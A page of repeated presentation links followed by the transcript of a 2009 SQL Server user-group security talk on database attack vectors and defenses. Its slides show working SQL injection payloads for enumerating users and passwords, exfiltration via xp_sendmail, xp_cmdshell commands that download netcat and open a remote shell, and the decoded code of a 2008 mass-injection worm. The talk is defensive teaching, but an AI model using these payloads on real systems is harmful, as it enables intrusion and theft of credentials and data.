Microsoft SQL Server Relational Databases and Primary Keys
Mark Ginnebaugh
 
DesignMind Microsoft Business Intelligence SQL Server
DesignMind Microsoft Business Intelligence SQL ServerDesignMind Microsoft Business Intelligence SQL Server
DesignMind Microsoft Business Intelligence SQL Server
Mark Ginnebaugh
 
San Francisco Bay Area SQL Server July 2013 meetings
San Francisco Bay Area SQL Server July 2013 meetingsSan Francisco Bay Area SQL Server July 2013 meetings
San Francisco Bay Area SQL Server July 2013 meetings
Mark Ginnebaugh
 
Silicon Valley SQL Server User Group June 2013
Silicon Valley SQL Server User Group June 2013Silicon Valley SQL Server User Group June 2013
Silicon Valley SQL Server User Group June 2013
Mark Ginnebaugh
 
Microsoft SQL Server Continuous Integration
Microsoft SQL Server Continuous IntegrationMicrosoft SQL Server Continuous Integration
Microsoft SQL Server Continuous Integration
Mark Ginnebaugh
 
Hortonworks Big Data & Hadoop
Hortonworks Big Data & HadoopHortonworks Big Data & Hadoop
Hortonworks Big Data & Hadoop
Mark Ginnebaugh
 
Microsoft SQL Server Physical Join Operators
Microsoft SQL Server Physical Join OperatorsMicrosoft SQL Server Physical Join Operators
Microsoft SQL Server Physical Join Operators
Mark Ginnebaugh
 
Microsoft Data Warehouse Business Intelligence Lifecycle - The Kimball Approach
Microsoft Data Warehouse Business Intelligence Lifecycle - The Kimball ApproachMicrosoft Data Warehouse Business Intelligence Lifecycle - The Kimball Approach
Microsoft Data Warehouse Business Intelligence Lifecycle - The Kimball Approach
Mark Ginnebaugh
 
Fusion-io Memory Flash for Microsoft SQL Server 2012
Fusion-io Memory Flash for Microsoft SQL Server 2012Fusion-io Memory Flash for Microsoft SQL Server 2012
Fusion-io Memory Flash for Microsoft SQL Server 2012
Mark Ginnebaugh
 
Microsoft Data Mining 2012
Microsoft Data Mining 2012Microsoft Data Mining 2012
Microsoft Data Mining 2012
Mark Ginnebaugh
 
Microsoft SQL Server PASS News August 2012
Microsoft SQL Server PASS News August 2012Microsoft SQL Server PASS News August 2012
Microsoft SQL Server PASS News August 2012
Mark Ginnebaugh
 
Business Intelligence Dashboard Design Best Practices
Business Intelligence Dashboard Design Best PracticesBusiness Intelligence Dashboard Design Best Practices
Business Intelligence Dashboard Design Best Practices
Mark Ginnebaugh
 
Microsoft Mobile Business Intelligence
Microsoft Mobile Business Intelligence Microsoft Mobile Business Intelligence
Microsoft Mobile Business Intelligence
Mark Ginnebaugh
 
Microsoft SQL Server 2012 Cloud Ready
Microsoft SQL Server 2012 Cloud ReadyMicrosoft SQL Server 2012 Cloud Ready
Microsoft SQL Server 2012 Cloud Ready
Mark Ginnebaugh
 
Microsoft SQL Server 2012 Master Data Services
Microsoft SQL Server 2012 Master Data ServicesMicrosoft SQL Server 2012 Master Data Services
Microsoft SQL Server 2012 Master Data Services
Mark Ginnebaugh
 
Microsoft SQL Server PowerPivot
Microsoft SQL Server PowerPivotMicrosoft SQL Server PowerPivot
Microsoft SQL Server PowerPivot
Mark Ginnebaugh
 
Microsoft SQL Server Testing Frameworks
Microsoft SQL Server Testing FrameworksMicrosoft SQL Server Testing Frameworks
Microsoft SQL Server Testing Frameworks
Mark Ginnebaugh
 
Automating Microsoft Power BI Creations 2015
Automating Microsoft Power BI Creations 2015Automating Microsoft Power BI Creations 2015
Automating Microsoft Power BI Creations 2015
Mark Ginnebaugh
 
Microsoft SQL Server Analysis Services (SSAS) - A Practical Introduction
Microsoft SQL Server Analysis Services (SSAS) - A Practical Introduction Microsoft SQL Server Analysis Services (SSAS) - A Practical Introduction
Microsoft SQL Server Analysis Services (SSAS) - A Practical Introduction
Mark Ginnebaugh
 
Platfora - An Analytics Sandbox In A World Of Big Data
Platfora - An Analytics Sandbox In A World Of Big DataPlatfora - An Analytics Sandbox In A World Of Big Data
Platfora - An Analytics Sandbox In A World Of Big Data
Mark Ginnebaugh
 
Microsoft SQL Server Relational Databases and Primary Keys
Microsoft SQL Server Relational Databases and Primary KeysMicrosoft SQL Server Relational Databases and Primary Keys
Microsoft SQL Server Relational Databases and Primary Keys
Mark Ginnebaugh
 
DesignMind Microsoft Business Intelligence SQL Server
DesignMind Microsoft Business Intelligence SQL ServerDesignMind Microsoft Business Intelligence SQL Server
DesignMind Microsoft Business Intelligence SQL Server
Mark Ginnebaugh
 
San Francisco Bay Area SQL Server July 2013 meetings
San Francisco Bay Area SQL Server July 2013 meetingsSan Francisco Bay Area SQL Server July 2013 meetings
San Francisco Bay Area SQL Server July 2013 meetings
Mark Ginnebaugh
 
Silicon Valley SQL Server User Group June 2013
Silicon Valley SQL Server User Group June 2013Silicon Valley SQL Server User Group June 2013
Silicon Valley SQL Server User Group June 2013
Mark Ginnebaugh
 
Microsoft SQL Server Continuous Integration
Microsoft SQL Server Continuous IntegrationMicrosoft SQL Server Continuous Integration
Microsoft SQL Server Continuous Integration
Mark Ginnebaugh
 
Hortonworks Big Data & Hadoop
Hortonworks Big Data & HadoopHortonworks Big Data & Hadoop
Hortonworks Big Data & Hadoop
Mark Ginnebaugh
 
Microsoft SQL Server Physical Join Operators
Microsoft SQL Server Physical Join OperatorsMicrosoft SQL Server Physical Join Operators
Microsoft SQL Server Physical Join Operators
Mark Ginnebaugh
 
Microsoft Data Warehouse Business Intelligence Lifecycle - The Kimball Approach
Microsoft Data Warehouse Business Intelligence Lifecycle - The Kimball ApproachMicrosoft Data Warehouse Business Intelligence Lifecycle - The Kimball Approach
Microsoft Data Warehouse Business Intelligence Lifecycle - The Kimball Approach
Mark Ginnebaugh
 
Fusion-io Memory Flash for Microsoft SQL Server 2012
Fusion-io Memory Flash for Microsoft SQL Server 2012Fusion-io Memory Flash for Microsoft SQL Server 2012
Fusion-io Memory Flash for Microsoft SQL Server 2012
Mark Ginnebaugh
 
Microsoft Data Mining 2012
Microsoft Data Mining 2012Microsoft Data Mining 2012
Microsoft Data Mining 2012
Mark Ginnebaugh
 
Microsoft SQL Server PASS News August 2012
Microsoft SQL Server PASS News August 2012Microsoft SQL Server PASS News August 2012
Microsoft SQL Server PASS News August 2012
Mark Ginnebaugh
 
Business Intelligence Dashboard Design Best Practices
Business Intelligence Dashboard Design Best PracticesBusiness Intelligence Dashboard Design Best Practices
Business Intelligence Dashboard Design Best Practices
Mark Ginnebaugh
 
Microsoft Mobile Business Intelligence
Microsoft Mobile Business Intelligence Microsoft Mobile Business Intelligence
Microsoft Mobile Business Intelligence
Mark Ginnebaugh
 
Microsoft SQL Server 2012 Cloud Ready
Microsoft SQL Server 2012 Cloud ReadyMicrosoft SQL Server 2012 Cloud Ready
Microsoft SQL Server 2012 Cloud Ready
Mark Ginnebaugh
 
Microsoft SQL Server 2012 Master Data Services
Microsoft SQL Server 2012 Master Data ServicesMicrosoft SQL Server 2012 Master Data Services
Microsoft SQL Server 2012 Master Data Services
Mark Ginnebaugh
 
Microsoft SQL Server PowerPivot
Microsoft SQL Server PowerPivotMicrosoft SQL Server PowerPivot
Microsoft SQL Server PowerPivot
Mark Ginnebaugh
 
Microsoft SQL Server Testing Frameworks
Microsoft SQL Server Testing FrameworksMicrosoft SQL Server Testing Frameworks
Microsoft SQL Server Testing Frameworks
Mark Ginnebaugh
 

Recently uploaded (20)

Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In FranceManifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
chb3
 
Linux Professional Institute LPIC-1 Exam.pdf
Linux Professional Institute LPIC-1 Exam.pdfLinux Professional Institute LPIC-1 Exam.pdf
Linux Professional Institute LPIC-1 Exam.pdf
RHCSA Guru
 
Linux Support for SMARC: How Toradex Empowers Embedded Developers
Linux Support for SMARC: How Toradex Empowers Embedded DevelopersLinux Support for SMARC: How Toradex Empowers Embedded Developers
Linux Support for SMARC: How Toradex Empowers Embedded Developers
Toradex
 
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
BookNet Canada
 
ThousandEyes Partner Innovation Updates for May 2025
ThousandEyes Partner Innovation Updates for May 2025ThousandEyes Partner Innovation Updates for May 2025
ThousandEyes Partner Innovation Updates for May 2025
ThousandEyes
 
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Aqusag Technologies
 
Into The Box Conference Keynote Day 1 (ITB2025)
Into The Box Conference Keynote Day 1 (ITB2025)Into The Box Conference Keynote Day 1 (ITB2025)
Into The Box Conference Keynote Day 1 (ITB2025)
Ortus Solutions, Corp
 
What is Model Context Protocol(MCP) - The new technology for communication bw...
What is Model Context Protocol(MCP) - The new technology for communication bw...What is Model Context Protocol(MCP) - The new technology for communication bw...
What is Model Context Protocol(MCP) - The new technology for communication bw...
Vishnu Singh Chundawat
 
Drupalcamp Finland – Measuring Front-end Energy Consumption
Drupalcamp Finland – Measuring Front-end Energy ConsumptionDrupalcamp Finland – Measuring Front-end Energy Consumption
Drupalcamp Finland – Measuring Front-end Energy Consumption
Exove
 
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdfComplete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Software Company
 
HCL Nomad Web – Best Practices and Managing Multiuser Environments
HCL Nomad Web – Best Practices and Managing Multiuser EnvironmentsHCL Nomad Web – Best Practices and Managing Multiuser Environments
HCL Nomad Web – Best Practices and Managing Multiuser Environments
panagenda
 
Mobile App Development Company in Saudi Arabia
Mobile App Development Company in Saudi ArabiaMobile App Development Company in Saudi Arabia
Mobile App Development Company in Saudi Arabia
Steve Jonas
 
Splunk Security Update | Public Sector Summit Germany 2025
Splunk Security Update | Public Sector Summit Germany 2025Splunk Security Update | Public Sector Summit Germany 2025
Splunk Security Update | Public Sector Summit Germany 2025
Splunk
 
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdfSAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
Precisely
 
Electronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploitElectronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploit
niftliyevhuseyn
 
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager APIUiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPathCommunity
 
DevOpsDays Atlanta 2025 - Building 10x Development Organizations.pptx
DevOpsDays Atlanta 2025 - Building 10x Development Organizations.pptxDevOpsDays Atlanta 2025 - Building 10x Development Organizations.pptx
DevOpsDays Atlanta 2025 - Building 10x Development Organizations.pptx
Justin Reock
 
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptxIncreasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Anoop Ashok
 
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdfThe Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
Abi john
 
Generative Artificial Intelligence (GenAI) in Business
Generative Artificial Intelligence (GenAI) in BusinessGenerative Artificial Intelligence (GenAI) in Business
Generative Artificial Intelligence (GenAI) in Business
Dr. Tathagat Varma
 
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In FranceManifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
chb3
 
Linux Professional Institute LPIC-1 Exam.pdf
Linux Professional Institute LPIC-1 Exam.pdfLinux Professional Institute LPIC-1 Exam.pdf
Linux Professional Institute LPIC-1 Exam.pdf
RHCSA Guru
 
Linux Support for SMARC: How Toradex Empowers Embedded Developers
Linux Support for SMARC: How Toradex Empowers Embedded DevelopersLinux Support for SMARC: How Toradex Empowers Embedded Developers
Linux Support for SMARC: How Toradex Empowers Embedded Developers
Toradex
 
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
BookNet Canada
 
ThousandEyes Partner Innovation Updates for May 2025
ThousandEyes Partner Innovation Updates for May 2025ThousandEyes Partner Innovation Updates for May 2025
ThousandEyes Partner Innovation Updates for May 2025
ThousandEyes
 
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Aqusag Technologies
 
Into The Box Conference Keynote Day 1 (ITB2025)
Into The Box Conference Keynote Day 1 (ITB2025)Into The Box Conference Keynote Day 1 (ITB2025)
Into The Box Conference Keynote Day 1 (ITB2025)
Ortus Solutions, Corp
 
What is Model Context Protocol(MCP) - The new technology for communication bw...
What is Model Context Protocol(MCP) - The new technology for communication bw...What is Model Context Protocol(MCP) - The new technology for communication bw...
What is Model Context Protocol(MCP) - The new technology for communication bw...
Vishnu Singh Chundawat
 
Drupalcamp Finland – Measuring Front-end Energy Consumption
Drupalcamp Finland – Measuring Front-end Energy ConsumptionDrupalcamp Finland – Measuring Front-end Energy Consumption
Drupalcamp Finland – Measuring Front-end Energy Consumption
Exove
 
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdfComplete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Software Company
 
HCL Nomad Web – Best Practices and Managing Multiuser Environments
HCL Nomad Web – Best Practices and Managing Multiuser EnvironmentsHCL Nomad Web – Best Practices and Managing Multiuser Environments
HCL Nomad Web – Best Practices and Managing Multiuser Environments
panagenda
 
Mobile App Development Company in Saudi Arabia
Mobile App Development Company in Saudi ArabiaMobile App Development Company in Saudi Arabia
Mobile App Development Company in Saudi Arabia
Steve Jonas
 
Splunk Security Update | Public Sector Summit Germany 2025
Splunk Security Update | Public Sector Summit Germany 2025Splunk Security Update | Public Sector Summit Germany 2025
Splunk Security Update | Public Sector Summit Germany 2025
Splunk
 
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdfSAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
Precisely
 
Electronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploitElectronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploit
niftliyevhuseyn
 
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager APIUiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPathCommunity
 
DevOpsDays Atlanta 2025 - Building 10x Development Organizations.pptx
DevOpsDays Atlanta 2025 - Building 10x Development Organizations.pptxDevOpsDays Atlanta 2025 - Building 10x Development Organizations.pptx
DevOpsDays Atlanta 2025 - Building 10x Development Organizations.pptx
Justin Reock
 
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptxIncreasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Anoop Ashok
 
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdfThe Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
Abi john
 
Generative Artificial Intelligence (GenAI) in Business
Generative Artificial Intelligence (GenAI) in BusinessGenerative Artificial Intelligence (GenAI) in Business
Generative Artificial Intelligence (GenAI) in Business
Dr. Tathagat Varma
 

Think Like a Hacker - Database Attack Vectors

  • 1. “Think Like A Hacker” Database Attack Vectors and Techniques to Thwart Them Silicon Valley SQL Server User Group September 15, 2009 Mark Ginnebaugh, User Group Leader www.bayareasql.org
  • 2. Presenters: Slavik Markovich Sudha Iyer CTO, Sentrigo Director, LogLogic
  • 3. What’s This Presentation All About? Know your enemy Understand types of problems and exploits Common DB hacking techniques Explain how to avoid SQL injection problems Raising the bar for the hackers
  • 4. What are database security threats? Databases hold volumes of sensitive data e.g. credit card numbers, financial results, bank records, billing information, intellectual property, customer lists, personal data … But: • Databases are not monitored • Seldom upgraded • Not patched This makes databases an easy target
  • 5. Databases - The Crown Jewels Types of hacking by number of breaches * Types of hacking by number of breaches Unauthorized access via default or shared 17 / 53% credentials SQL Injection 16 / 79% Improperly Constrained or Misconfigured ACLs 9 / 66% Unauthorized access via Stolen Credentials 7 / 0.1% Authentication Bypass 5 / 0.1% Brute-Force 4 / 7% Privilege Escalations 4 / 0% Exploitation of Session Variables 3 / 0% Buffer Overflow 3 / 0% Cross-Site Scripting 1 / 0% * 2009 Verizon Data Breach Report
  • 6. Some Examples Database breaches exist since the first DB SB 1386 (July 2003), a U.S. law mandating breach notification, made them public Over 130M credit and debit cards • Heartland Payment Systems Hannaford Brothers, 7-Eleven, T.J. Maxx, Barnes & Noble, BJ's Wholesale Club, Boston Market, DSW, Forever 21, Office Max and Sports Authority Many breaches remain undetected or not made public
  • 7. Know Your Enemy Unauthorized access - not just hackers • Too many privileges Internal attacks • Disgruntled employees • Just trying to get the job done • Industrial espionage, Identity theft, etc. • Look around you!!!
  • 8. The Problems Does a hacker need DBA access? Myriad of privileges • System level, Application level, Data access • Any privilege in the right circumstances can be an issue Other issues • Network issues, incorrect configuration • Too many features – large attack surface
  • 9. The Problems Most typical problems of real world databases • Weak / default passwords for database accounts • Missing patches / patchsets – see http://en.wikipedia.org/wiki/SQL_slammer_ (computer_worm) • Unsecure customer / 3rd party code (T-SQL stored procedures)
  • 10. Basic Hacking Techniques Reconnaissance: nmap - http://nmap.org/ SQLPing3 - http://sqlsecurity.com/
  • 11. Basic Hacking Techniques Crack the passwords • Many brute force tools out there
  • 12. Newly Released Vulnerability Use DBCC Bytes to read passwords from memory Never use SQL Server Native Authentication
  • 13. Powerful Tools Are Easily Available
  • 14. Basic Hacking – The Human Factor Wait for your DBA to go for a coffee break Go to his desktop Open Management Studio Add yourself as an administrator to the database of your choice This can be easily scripted and put on a USB drive
  • 15. SQL Injection (from Wikipedia) • a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.
  • 16. SQL Injection Exists in any layer of any application • C/S and Web Applications • Stored program units Build in User created Has many forms • Extra queries, unions, order by, sub selects Easily avoided • Bind variables, strong typing
  • 17. SQL Injection Types In band – Use injection to return extra data • Part of normal result set (unions) • In error messages Out of band – Use alternative route like UTL_HTTP, DNS to extract data Blind / Inference – No data is returned but the hacker is able to infer the data using return codes, error codes, timing measurements and more
  • 18. SQL Injection In-band select * from AdventureWorks.HumanResources.Employee where EmployeeID = 1; select name, password from sys.syslogins where password is not null 1 14417807 1209 adventure-worksguy1 16 Production Technician - WC60 1972-05-15 00:00:00.000 M M 1996- 07-31 00:00:00.000 0 21 30 1 AAE1D04A-C237- 4974-B4D5-935247737718 2004-07-31 00:00:00.000 2 sa 虀뛎◌豕醜‫ߨᦉﬥ‬ 㾋㴼绳ᦉ 3 test ꍮᒬᦉᦉ쵌藌 街Ḷ왏 컕 Now, just attack the password hash using either using brute-force or dictionary.
  • 19. SQL Injection In-Band Using errors – inject the following: 1 and 1 in (select @@version) Result is: Msg 245, Level 16, State 1, Line 1 Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3054.00 (Intel X86) Mar 23 2007 16:28:52 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition on Windows NT 5.1 (Build 2600: Service Pack 2) to data type int.
  • 20. SQL Injection Out-of-band Send information via HTTP/SMTP/DNS to an external site: select * from AdventureWorks.HumanResources.Employee where EmployeeID = 1; EXEC master.dbo.xp_sendmail @recipients=N'[email protected]', @query = N'select user, password from sys.syslogins where password is not null' ; Same can be done with DNS access – no one blocks this… Search for DNS-Request: www.8A8F025737A9097A.sentrigo.com and collect the logs from the DNS server
  • 21. Blind SQL Injection Example code: If is_srvrolemember('sysdamin') > 0) waitfor delay '0:0:5' If (ascii(substring(@string, @byte, 1)) & (power(2, @bit))) > 0 waitfor '0:0:5'
  • 22. SQL Injection – Web Application Username = ' or 1=1 -- The original statement looked like: 'select * from users where username = ''' + username + ''' and password = ''' + password + '''' The result = select * from users where username = '' or 1=1 --' and password = ''
  • 23. Start The Attack Use a single quote as the username: select * from users where username = ''' and password = '' Msg 105, Level 15, State 1, Line 1 Unclosed quotation mark after the character string '' '. Msg 102, Level 15, State 1, Line 1 Incorrect syntax near '' '.
  • 24. Let’s Find More Data Add an invalid username – ' having 1=1— select * from users where username = '' having 1=1 -- and password = '' Msg 8120, Level 16, State 1, Line 1 Column 'users.name' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
  • 25. Let’s Find More Data – Part II Find out other columns by adding ' group by users.username having 1=1 -- select * from users where username = '' group by users.username having 1=1 -- and password = '' Msg 8120, Level 16, State 1, Line 1 Column 'users.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
  • 26. Now, Add Some Data From Table Pass in – '; insert into users (username, password) values ('haxor', 'p0wned') -- select * from users where username = ''; insert into users (username, password) values ('haxor', 'p0wned') -- and password = ''
  • 27. Or, Get Some Data Pass in – ' union select min(username) from users where username > 'a' -- select * from users where username = '' union select min(username) from users where username > 'a' -- and password = '' Msg 245, Level 16, State 1, Line 1 Conversion failed when converting the nvarchar value 'admin' to data type int.
  • 28. Now We Can Enumerate All Users Pass in the resulting user in a loop – ' union select min(username) from users where username > 'admin' – Now, select the password for admin – ' or 1 in (select password from users where username = 'admin') -- Msg 245, Level 16, State 1, Line 1 Conversion failed when converting the varchar value 'xxxxx' to data type int.
  • 29. System Level Attacks Well, we all know about xp_cmdshell Pass in – '; exec master..xp_cmdshell 'dir > c:dir.txt' – Payload can be: 'nslookup attacker_machine' to signal to the attacker that attack succeeded 'tftp –I 192.168.0.1 GET nc.exe c:nc.exe' – Now we have something to work with 'C:nc.exe 192.168.0.1 53 –e cmd.exe' – Let's start a remote command shell
  • 30. Real World Example Mass SQL worm in the wild since April 08 Enumerates all input fields and tries various SQL injection techniques Iterates on all text fields in the database and adds a call to a malicious script
  • 31. Real World Example SELECT * FROM dbo.xxx WHERE yyy=1;DECLARE @S VARCHAR(4000);SET @S=CAST(0×4445434C415245204054205641524348415228323535292C404320564152434 841522832353529204445434C415245205461626C655F437572736F7220435552534F5220 464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6 563747320612C737973636F6C756D6E73206220574845524520612E69643D622E69642041 4E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E7 8747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D3136 3729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D2 05461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443 485F5354415455533D302920424547494E20455845432827555044415445205B272B40542 B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841 522834303030292C5B272B40432B275D29292B27273C736372697074207372633D6874747 03A2F2F7777772E616477626E722E636F6D2F622E6A733E3C2F7363726970743E27272729 204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F20405 42C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F434154 45205461626C655F437572736F7220 AS VARCHAR(4000)); EXEC (@S);-- ORDER BY ooo ASC Wow, how to read this?
  • 32. Real World Example DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype=’u’ AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC(’UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+”<script src=http://www.chkadw.com/b.js></script>”’) FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
  • 33. Real World Example The interesting part is here: ’UPDATE ['SOME_TABLE'] SET ['SOME_TEXT_COL']=RTRIM(CONVERT(VARCHAR( 4000),['SOME_TEXT_COL']))+”<script src=http://www.chkadw.com/b.js></script>”’ This is why you should use NoScript even for trusted sites
  • 34. Protecting Your Database Think like a hacker • Learn about exploits • Always look for security issues Configuration, permissions, bugs Learn and use available tools • nmap, Metasploit, Wireshark, Hydra, Cryptool, SQLPing, Passwordizer, etc.
  • 35. Protecting Your Database Apply patch sets and upgrades • Easier said than done Check for default and weak passwords regularly Secure the network • Valid node checking + firewall • Use encryption
  • 36. Protecting Your Database Install only what you use, remove all else • Reduce your attack surface The least privilege principle • Lock down packages System access, file access, network access Encrypt critical data Use secure coding techniques • Bind variables, input validation • Clear ownership of security issues
  • 37. Bind Variables – Java Statement stmt = conn.createStatement(); ResultSet rs = stmt.executeQuery( "select * from users where username = '" + username + "'"; vs. PreparedStatement pstmt = conn.prepareStatement("select * from users where username = ?"); pstmt.setString(1, username); ResultSet rs = pstmt.executeQuery();
  • 38. Bind Variables - ASP Dim rsQuery Set rsQuery = Server.CreateObject("ADODB.Recordset") rsQuery.ActiveConnection = xxx rsQuery.Source = "SELECT * FROM users WHERE username = '" + username + "' AND password = '" + password + "'" rsQuery.CursorType = 0 rsQuery.CursorLocation = 2 rsQuery.LockType = 1 rsQuery.Open() VS. Dim rsQuery rsQuery = Server.CreateObject ("ADODB.Command") rsQuery.ActiveConnection = xxx rsQuery.CommandText = "SELECT * FROM users WHERE username = ? AND password = ?" rsQuery.Parameters.Append rsQuery.CreateParameter("username", 200, 1, 50, username) rsQuery.Parameters.Append rsQuery.CreateParameter("password", 200, 1, 50, password) rsQuery.Prepared = True Set rsResult = rsQuery.Execute
  • 39. Secure Coding Policies Setup secure coding policies for the different languages Make the coding policies part of every contract – external and internal Default document for all developers OWASP
  • 40. Some Coding Rules Avoid hardcoding username/password Use full qualified names for function and procedure calls Always validate user/database input Be careful with dynamic statements (Cursors, SQL- Statements, …) Be careful with file access Be careful with OS command execution
  • 41. LogLogic Database Security Manager Host-based Sensor Technology In-Depth Activity Monitoring Granular Policy-based Detection Integrated Prevention Capabilities Real-Time Virtual Patching Compliance Reporting and Forensics Appliance-based Solution
  • 42. Integrated Solution LogLogic Database Security Manager LogLogic Open Log Management » Granular policy-based detection » Compliance reporting » Integrated prevention capabilities » Long term archival » Real-time virtual patching » Forensics analysis
  • 44. www.bayareasql.org To attend our meetings or inquire about speaking opportunities, please contact: Mark Ginnebaugh, User Group Leader [email protected]